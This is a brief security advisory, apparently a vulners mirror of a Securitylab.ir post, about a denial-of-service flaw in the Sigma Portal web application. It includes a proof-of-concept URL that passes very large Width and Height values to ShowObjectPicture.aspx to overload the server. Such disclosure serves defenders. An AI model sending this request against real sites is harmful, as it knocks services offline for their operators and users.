Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25402
HistoryDec 28, 2010 - 12:00 a.m.

Sigma Portal Denial of Service Vulnerability

2010-12-2800:00:00
vulners.com
76

#################################################################

Securitylab.ir

#################################################################

Application Info:

Name: Sigma Portal

Vendor: http://www.sigma.ir

#################################################################

Vulnerability Info:

Type: Denial of Service

Risk: Medium

2010-08-11 - Vendor notified

#################################################################
Vulnerability:
http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

With setting of large values of width and height it's possible to create
large load at the server.
#################################################################

Discoverd By: Pouya Daneshmand

Website: http://Securitylab.ir

Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com

###################################################################